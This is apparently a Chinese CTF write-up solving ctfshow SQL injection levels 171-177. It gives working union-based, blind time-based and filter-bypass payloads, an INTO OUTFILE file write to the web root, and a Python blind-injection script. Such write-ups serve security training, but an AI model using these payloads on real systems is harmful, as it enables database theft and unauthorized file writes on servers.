ctfshow-web入门-sql注入-171-177


web171

sql语句 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

第一题的sql注入是没有什么注入的,直接使用万能注入,payload1' or 1=1 --+

或者先获得表名,然后查询

1.payload1' union select 1,2,database() --+或者union select 1,2,schema_name from information_schema.schemata,获得数据库的名字

2.payload1' union select 1,2,table_name from information_schema.tables where table_schema=database() --+,获得表的名字

3.payload1' union select 1,2,column_name from information_schema.columns where table_name='ctfshow_user' --+获得列的名字

4.payload1' union select id,username,password from ctfshow_user --+ 得到flag

web172

查询语句

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }
      

首先这一题比上一题多加了查询返回的username值是否有flag,但是我们要的flag在password中,所以并不影响

  • ```sql
    payload:1’ union select 1,database() –+
    payload:1’ union select 1,table_name from information_schema.tables where table_schema=database() –+
    payload:1’ union select 1,column_name from information_schema.columns where table_name=’ctfshow_user2’ –+
    payload:1’ union select 1,password from ctfshow_user2 –+
    
    - ```sql
      payload:1' union select to_base64(username),password from ctfshow_user2 where username='flag' --+

知识点1.编码函数to_base64(),hex()。

web173

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
      

同web172

web174

查询语句

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
      

返回的数值中不能有flag和数字,可以使用sql的replace替换,把数字替换成字母,然后再写一个脚本替换回来

payload1' union select 'a',replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(password,'0','numa'),'1','numb'),'2','numc'),' 3','numd'),'4','nume'),'5','numf'),'6','numg'),'7','numh'),'8','numi'),'9','numj') from ctfshow_user4 --+

然后是替换的脚本

a = 'ctfshow{fnumcnumjdnumfnumbnuminumi-numgnumcnuminuma-numeabe-numjnuminumfd-eanuminumgnumfnumbnumenumbnumbnumgnumcnumc}'
a= a.replace('numa',"0")
a= a.replace('numb',"1")
a= a.replace('numc',"2")
a= a.replace('numd',"3")
a= a.replace('nume',"4")
a= a.replace('numf',"5")
a= a.replace('numg',"6")
a= a.replace('numh',"7")
a= a.replace('numi',"8")
a= a.replace('numj',"9")
print(a)

即可得到flag

web175

查询语句

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user5 where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }
      

过滤了ascii字符,我们可以使用盲注或者利用读写文件写入网站根目录

解法一

1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+

然后访问1.txt即可

解法二

# @Author:Y4tacker
import requests

url = "http://57e00653-fc1c-474b-9281-8f1dffb0bc34.challenge.ctf.show:8080/api/v5.php?id=1' and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select  password from ctfshow_user5 where username=\'flag\' limit 0,1),{i},1))>{mid},sleep(2),0) -- -'
        try:
            r = requests.get(url + payload, timeout=0.5)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)


web176

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }
     

首先payload1' union select 1,2,password from ctfshow_user --+报错了,因为sql对大小写不敏感,所以先试试大小写过滤。payload1' union sElect 1,2,password from ctfshow_user --+ 发现可以过。

web177

查询语句

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user where username !='flag' and id = '".$_GET['id']."' limit 1;";
      
返回逻辑

//对传入的参数进行了过滤
  function waf($str){
   //代码过于简单,不宜展示
  }
      

先输入1’–+,发现无数据,换一种注释的方式payload1'%23发现可以,猜测过滤了空格,首先试试万能密码

解法一:payload1'or(1=1)%23

知识点:在sql中/**/可以表示空格

解法二:payload1'/**/union/**/select/**/1,username,password/**/from/**/ctfshow_user/**/where/**/username='flag'/**/limit/**/1,1%23


文章作者: Rolemee
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Rolemee !
  目录